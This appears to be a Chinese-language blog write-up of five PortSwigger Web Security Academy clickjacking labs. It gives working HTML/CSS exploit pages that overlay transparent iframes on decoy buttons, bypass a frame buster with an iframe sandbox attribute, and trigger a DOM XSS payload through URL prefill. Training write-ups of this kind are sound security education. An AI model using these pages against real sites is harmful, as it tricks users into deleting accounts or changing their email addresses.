Portswigger web security academy:Clickjacking (UI redressing)

1 - Basic clickjacking with CSRF token protection

  • 题目描述

    • 登陆后可以删除账号,但是该功能点有csrf token保护

  • 要求

    • 让受害者删掉自己的账号

  • 解题过程

    • 因为要调CSS,就先用一下材料里给的代码看看(具体参数有问题,自己调整调整,显示没过,然后修改的时候提示solved。。。原本的参数没记下来)

      <head>
      
  <style>
      
    #target_website {
      
        position: relative;
      
        width: 1280px;
      
        height: 400px;
      
        opacity: 0.0000000000001;
      
        z-index: 2;
      
      }
      
    #decoy_website {
      
      position:absolute;
      
      top:575px;
      
      left:100px;
      
      z-index:1;
      
      }
      
  </style>
      
</head>
      
...
      
<body>
      
  <div id="decoy_website">
      
  click
      
  </div>
      
  <iframe id="target_website" src="https://ac411f1c1e3720d880aa0ddc00c8008d.web-security-academy.net/my-account">
      
  </iframe>
      
</body>

2 - Clickjacking with form input data prefilled from a URL parameter

  • 题目描述

    • 没啥描述的

  • 要求

    • 利用预填充来修改用户邮箱

  • 解题过程

    • 访问/my-account?email=asd@asd.asd,发现邮箱被预填充进页面

    • 构造恶意页面,钓鱼(借助上一题的代码)

      <head>
      
  <style>
      
    #target_website {
      
        position: relative;
      
        width: 400px;
      
        height: 600px;
      
        opacity: 0.0000001;
      
        z-index: 2;
      
      }
      
    #decoy_website {
      
      position:absolute;
      
      top:525px;
      
      left:100px;
      
      z-index:1;
      
      }
      
  </style>
      
</head>
      
<body>
      
  <div id="decoy_website">
      
  Click me
      
  </div>
      
  <iframe id="target_website" src="https://ac131f121fdf9d78802b4cc1006300fb.web-security-academy.net/my-account?email=asd@asd.asd">
      
  </iframe>
      
</body>

3 - Clickjacking with a frame buster script

  • 题目描述

    • 这个lab被frame buster保护着

  • 要求

    • 修改受害者邮箱

  • 解题过程

    • 材料里有说frame buster,大致意思就是只接受自己是最顶层网页(根节点),关于这个东西google上挺多的,[贴一个])(https://zhuanlan.zhihu.com/p/27310909)

    • 但是 iframe指定sandbox为allow-forms或者allow-scripts,且忽略allow-top-navigation会使iframe中的网页不知道自己是否是最顶层网页

    • 构造exp

      <head>
      
  <style>
      
    #target_website {
      
        position: relative;
      
        width: 400px;
      
        height: 600px;
      
        opacity: 0.0000001;
      
        z-index: 2;
      
      }
      
    #decoy_website {
      
      position:absolute;
      
      top:505px;
      
      left:100px;
      
      z-index:1;
      
      }
      
  </style>
      
</head>
      
<body>
      
  <div id="decoy_website">
      
  Click me
      
  </div>
      
  <iframe id="target_website" sandbox="allow-forms" src="https://ac741fe61e32394280fe03af00970035.web-security-academy.net/my-account?email=asd@asd.asd">
      
  </iframe>
      
</body>

4 - Exploiting clickjacking vulnerability to trigger DOM-based XSS

  • 题目描述

    • 把Dom based XSS和Clickjacking结合起来

  • 要求

    • alert(document.cookie)

  • 解题过程

    • 首先找XSS,发现在feedback页面可以使用GET预填充参数,提交后,会把name直接打印出来

    • 构造exp

      <head>
      
  <style>
      
    #target_website {
      
        position: relative;
      
        width: 1000px;
      
        height: 1000px;
      
        opacity: 0.00000001;
      
        z-index: 2;
      
      }
      
    #decoy_website {
      
      position:absolute;
      
      top:805px;
      
      left:100px;
      
      z-index:1;
      
      }
      
  </style>
      
</head>
      
<body>
      
  <div id="decoy_website">
      
  Click me
      
  </div>
      
  <iframe id="target_website" src="https://ac2c1f701efa1dee807e67af00d40001.web-security-academy.net/feedback?name=%3Cimg/src=x%20onerror=alert(document.cookie)%3E&email=asd@asd.com&subject=asd&message=asd">
      
  </iframe>
      
</body>

5 - Multistep clickjacking

  • 题目描述

    • 这个lab的账号相关的功能点被csrf token保护着,并且有一个确认对话框来防止点击劫持

  • 要求

    • 让受害者删除自己的账号

  • 解题过程

    • 多了个对话框。。。相比实际场景,不需要动态显示就很简单了

    • 上exp

      <head>
      
  <style>
      
    #target_website {
      
        position: relative;
      
        width: 1000px;
      
        height: 1000px;
      
        opacity: 0.0000001;
      
        z-index: 2;
      
      }
      
    #decoy_website_1 {
      
      position:absolute;
      
      top:495px;
      
      left:60px;
      
      z-index:1;
      
      }
      
    #decoy_website_2 {
      
      position:absolute;
      
      top:285px;
      
      left:190px;
      
      z-index:1;
      
      }
      
  </style>
      
</head>
      
<body>
      
  <div id="decoy_website_1">
      
  Click me first
      
  </div>
      
  <div id="decoy_website_2">
      
  Click me next
      
  </div>
      
  <iframe id="target_website" src="https://ac871f9f1e4e40b7801a875000290076.web-security-academy.net/my-account">
      
  </iframe>
      
</body>

Portswigger web security academy:Clickjacking (UI redressing)的更多相关文章

  1. Portswigger web security academy:WebSockets

    Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...

  2. Portswigger web security academy:Cross-origin resource sharing (CORS)

    Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...

  3. Portswigger web security academy:XML external entity (XXE) injection

    Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...

  4. Portswigger web security academy:Cross-site request forgery (CSRF)

    Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...

  5. Portswigger web security academy:OAth authentication vulnerable

    Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...

  6. Portswigger web security academy:Server-side request forgery (SSRF)

    Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...

  7. Portswigger web security academy:OS command injection

    Portswigger web security academy:OS command injection 目录 Portswigger web security academy:OS command ...

  8. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  9. Portswigger web security academy:Server-side template injection(SSTI)

    Portswigger web security academy:Server-side template injection(SSTI) 目录 Portswigger web security ac ...

随机推荐

  1. mysql 使用sleep操作 update 来停止一段时间执行语句 [骚操作]

    update mytestTable inner join(select '2' as id, sleep(5)) a on mytestTable.id=a.id set mytestTable.n ...

  2. C# 基础 - Environment 类

    1. 程序根目录: (D:\\...\\WpfApp1\\WpfApp1\\bin\\Debug") string exePath = Environment.CurrentDirector ...

  3. 鸿蒙第三方组件——SwipeCaptcha滑动拼图验证组件

    目录:1.组件效果展示2.Sample解析3.<鸿蒙第三方组件>系列文章合集 前言 基于安卓平台的滑动拼图验证组件SwipeCaptcha( https://github.com/mcxt ...

  4. C# 通过ServiceStack 操作Redis——String类型的使用及示例

    1.引用Nuget包 ServiceStack.Redis 我这里就用别人已经封装好的Reids操作类,来演示,并附上一些说明 RedisConfigInfo--redis配置文件信息 /// < ...

  5. JS逆向-抠代码的第二天【手把手学会抠代码】

    今天的学习项目:沃支付:https://epay.10010.com/auth/login 清空浏览器缓存后,打开网页,输入手机号,密码222222,按照网站要求填入验证码(sorry,我没有账号密码 ...

  6. Codeforces Round #545 B. Circus

    题面: 传送门 题目描述: 马戏团中一共有N个人(N是偶数),有的人会扮演小丑,有的人会表演杂技.给出每个人会什么,然后按照下列规则把这些人分成两组: 每个人只能在其中一组 两个组的人数相等(也就是把 ...

  7. gstreamer应用开发(播放器)之旅

    GStreamer开发,主要分为两块:应用开发.插件开发. 插件开发人员,通常是编解码库的作者(做出了编解码库后,希望gstreamer能用起来这个库,因此增加这个适配层).芯片原厂人员(将自家的hw ...

  8. 【linux】驱动-4-LED芯片手册分析

    目录 前言 4. LED芯片手册分析 4.1 内存管理单元MMU 4.1.1 MMU的功能 4.1.2 TLB的作用 4.2 地址转换函数 4.2.1 ioremap函数 4.2.2 iounmap函 ...

  9. 【框架】SPI四种模式+通用设备驱动实现-源码

    目录 前言 bsp_spi.c bsp_spi.h bsp_flash.c bsp_flash.h 前言 SPI 介绍为搜集百度资料+个人理解 其余为原创(有误请指正) 集四种模式于一身 demo 采 ...

  10. .NET HttpWebRequest(请求被中止: 未能创建 SSL/TLS 安全通道)和(基础连接已经关闭: 发送时发生错误)问题查找解决

    前言: 前段时间在对接第三方接口的时候发生了一个非常奇葩的问题,就是使用 .NET Framework 4.6 HttpWebRequest进行网络请求的相关问题.背景,关于调用第三方的接口都是使用使 ...